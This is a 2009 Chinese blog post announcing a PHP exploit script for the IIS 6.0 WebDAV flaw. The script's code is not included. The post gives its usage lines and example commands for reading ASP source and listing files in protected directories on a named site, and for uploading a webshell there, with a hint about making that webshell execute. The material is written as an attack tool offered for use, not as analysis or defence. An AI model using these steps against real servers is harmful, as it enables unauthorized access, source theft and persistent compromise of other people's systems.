By racle@tian6.com && securiteweb.org
Source:www.tian6.com && www.securiteweb.org

IIS6.0 WEBDAV 漏洞录像和相关介绍论坛都发了好几天了.milw0rm.com昨天也公开了一个C版本利用程序.他的效果我不知道,还没有使用过.
现在tian6.com国内首先公布一个脚本EXP.

其实前天就想写一份无须编译的EXP.可惜手上没有环境,构建又太麻烦,所以昨天找了个朋友,一起写完这份EXP.
已经公布

使用说明:(具体使用或者测试方法,请参照天阳发的录像.)
******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********

Usage: php '.$argv[0].' source/path/put host path
Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp
Example2: php '.$argv[0].' path www.tian6.com /secret/
Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
复制代码
example:
php.exe i.php source www.tian6.com /blog/readme.asp
//查看tian6.com,受保护目录blog里的readme.asp源代码

php.exe i.php path www.tian6.com /secret/
//查看tian6.com,受保护目录secret里的所有目录.

php.exe i.php put www.tian6.com /secret/ test.txt
//test.txt和i.php放在一起,里面是你的WEBSHELL.这里的意思是在www.tian6.com受保护的目录secret里,从本地文件test.txt里读取内容,然后写到secret目录下.默认是racle.asp.但是这里有个问题,secret目录是受保护的,写进去一样不能运行.这里有个很简单的技巧,大家仔细看看录像吧.



分享到: 更多

这篇日志的 QR 二维码为:

五月 27th, 2009

Posted In: 未分类

发表评论

电子邮件地址不会被公开。 必填项已用*标注

无觅相关文章插件,快速提升流量